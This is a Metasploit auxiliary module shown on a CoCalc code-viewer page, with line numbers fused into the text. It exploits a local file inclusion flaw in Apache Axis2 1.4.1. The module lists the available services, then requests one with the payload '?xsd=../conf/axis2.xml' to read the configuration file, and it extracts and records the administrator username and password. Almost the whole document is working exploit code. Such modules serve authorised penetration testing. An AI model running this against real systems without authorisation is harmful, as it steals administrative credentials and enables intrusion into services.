CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/http/axis_local_file_include.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Report8include Msf::Auxiliary::Scanner91011def initialize12super(13'Name' => 'Apache Axis2 v1.4.1 Local File Inclusion',14'Description' => %q{15This module exploits an Apache Axis2 v1.4.1 local file inclusion (LFI) vulnerability.16By loading a local XML file which contains a cleartext username and password, attackers can trivially17recover authentication credentials to Axis services.18},19'References' =>20[21['EDB', '12721'],22['OSVDB', '59001'],23],24'Author' =>25[26'Tiago Ferreira <tiago.ccna[at]gmail.com>'27],28'License' => MSF_LICENSE29)3031register_options([32Opt::RPORT(8080),33OptString.new('TARGETURI', [false, 'The path to the Axis listServices', '/axis2/services/listServices']),34])35end3637def run_host(ip)38uri = normalize_uri(target_uri.path)3940begin41res = send_request_raw({42'method' => 'GET',43'uri' => uri,44}, 25)4546if (res and res.code == 200)47res.body.to_s.match(/\/axis2\/services\/([^\s]+)\?/)48new_uri = normalize_uri("/axis2/services/#{$1}")49get_credentials(new_uri)5051else52print_status("#{full_uri} - Apache Axis - The remote page not accessible")53return5455end5657rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout58rescue ::Timeout::Error, ::Errno::EPIPE5960end61end6263def report_cred(opts)64service_data = {65address: opts[:ip],66port: opts[:port],67service_name: (ssl ? 'https' : 'http'),68protocol: 'tcp',69workspace_id: myworkspace_id70}7172credential_data = {73origin_type: :service,74module_fullname: fullname,75username: opts[:user],76private_data: opts[:password],77private_type: :password78}.merge(service_data)7980login_data = {81last_attempted_at: DateTime.now,82core: create_credential(credential_data),83status: Metasploit::Model::Login::Status::SUCCESSFUL,84proof: opts[:proof]85}.merge(service_data)8687create_credential_login(login_data)88end8990def get_credentials(uri)91lfi_payload = "?xsd=../conf/axis2.xml"9293begin94res = send_request_raw({95'method' => 'GET',96'uri' => "#{uri}" + lfi_payload,97}, 25)9899print_status("#{full_uri} - Apache Axis - Dumping administrative credentials")100101if res.nil?102print_error("#{full_uri} - Connection timed out")103return104end105106if (res.code == 200)107if res.body.to_s.match(/axisconfig/)108109res.body.scan(/parameter\sname=\"userName\">([^\s]+)</)110username = $1111res.body.scan(/parameter\sname=\"password\">([^\s]+)</)112password = $1113114print_good("#{full_uri} - Apache Axis - Credentials Found Username: '#{username}' - Password: '#{password}'")115116report_cred(ip: rhost, port: rport, user: username, password: password, proof: res.body)117118else119print_error("#{full_uri} - Apache Axis - Not Vulnerable")120return :abort121end122123else124print_error("#{full_uri} - Apache Axis - Unrecognized #{res.code} response")125return :abort126127end128129rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout130rescue ::Timeout::Error, ::Errno::EPIPE131end132end133end134135136